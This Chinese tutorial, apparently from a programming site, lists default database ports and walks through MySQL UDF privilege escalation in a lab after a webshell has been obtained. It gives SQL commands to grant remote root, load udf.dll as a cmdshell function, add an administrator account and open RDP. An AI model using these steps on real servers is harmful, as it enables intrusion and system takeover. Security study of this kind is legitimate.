MySql提權(quán)的三種方式：

• udf提權(quán)
• mof提權(quán)
• 啟動項提權(quán)

以下是一些常見的數(shù)據(jù)庫及其默認端口：

1. MySQL: 默認端口為 3306

2. PostgreSQL: 默認端口為 5432

3. Oracle Database: 默認端口為 1521

4. Microsoft SQL Server: 默認端口為 1433

5. MongoDB: 默認端口為 27017

6. Redis: 默認端口為 6379

7. Elasticsearch: 默認端口為 9200 (HTTP) 和 9300 (內(nèi)部通信)

8. Cassandra: 默認端口為 9042

9. SQLite: 通常是本地文件系統(tǒng)，沒有固定端口

10. DB2: 默認端口為 50000

11.國產(chǎn)的DM達夢數(shù)據(jù)庫， 默認端口號為：5236;

mysql_UDF 提權(quán)：

拿到webshell之后，進行數(shù)據(jù)庫提權(quán)操作

一、端口掃描

二、信息收集：

如何獲取mysql賬號密碼

1.查看網(wǎng)站配置文件。

如:conn、config、data、sql、common 、inc、include等。

2.Mysql配置文件：C:\phpStudy\MySQL\data\mysql\user.MYD

例如：DVWA默認數(shù)據(jù)庫存儲在：C:/phpStudy/WWW/DVWA/config/config.inc.php.dist目錄

點擊查看：賬號:root 密碼:root

查看數(shù)據(jù)庫安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi

放到MD5在線網(wǎng)站進行解密

三、提權(quán)利用

注意事項：提權(quán)的第一步要知道數(shù)據(jù)庫的版本號:

（1）如果mysql<5.1    導出目錄 c:\windows 或  c:\windows\system32

（2）mysql=>5.1   導出安裝目錄\MySQL\lib\plugin

注*：默認mysql不能遠程連接，需要用菜刀進行本地連接

選擇mysql，填寫好賬號:root 密碼root,確認好提交進行連接

設(shè)置遠程連接，用于在本地連接。

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges; 重新加載權(quán)限數(shù)據(jù)

數(shù)據(jù)庫版本為5.5.53

由于本次實驗數(shù)據(jù)庫為5.5.53，因此選擇\MySQL\lib\plugin目錄。

提示報錯

前提條件為：secure_file_priv等于空，需要在my.ini配置文件中進行設(shè)置

修改之后，查看安裝dll文件完成。

創(chuàng)建cmdshell函數(shù)，執(zhí)行操作系統(tǒng)命令。

Create Function cmdshell returns string soname 'udf.dll';

使用cmdshll函數(shù)執(zhí)行操作系統(tǒng)命令

select cmdshell('whoami');
select cmdshell('net user 123 123/add');    添加用戶
select cmdshell('net localgroup administrators 123 /add');    將123用戶添加到管理組

開3389進行遠程連接

Create Function open3389 returns string soname 'udf.dll';
select open3389();    開啟3389遠程連接

注意：僅用于技術(shù)討論，切勿用于其他用途，一切后果與本人無關(guān)。

到此這篇關(guān)于mysql數(shù)據(jù)庫提權(quán)的三種方法的文章就介紹到這了,更多相關(guān)mysql數(shù)據(jù)庫提權(quán)內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評論